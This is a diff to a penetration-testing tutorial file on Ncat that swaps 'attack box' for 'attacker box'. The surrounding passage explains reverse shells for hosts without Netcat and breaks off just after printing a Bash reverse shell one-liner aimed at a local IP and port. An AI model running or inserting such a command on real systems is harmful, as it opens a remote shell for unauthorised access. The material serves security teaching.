thestationary/stationary/kali-tools/ncat.md

 #### Reverse shell without Netcat on the target host

 One major downside on the shown example is that you need Netcat on that target host which is very often not the case in real world scenario’s.
-In some cases Netcat is present, or we have a way to install it, but in many cases we need to use alternatives ways to connect back to the attack box.
+In some cases Netcat is present, or we have a way to install it, but in many cases we need to use alternatives ways to connect back to the attacker box.
 Let’s have a look at a few alternative ways to setup a reverse shell.

 ##### Bash reverse shell

-With can also use Bash to initiate a reverse shell from the target host to the attack box by using the following command:
+With can also use Bash to initiate a reverse shell from the target host to the attacker box by using the following command:

 ```
 $ bash -i >& /dev/tcp/192.168.100.113/4444 0>&1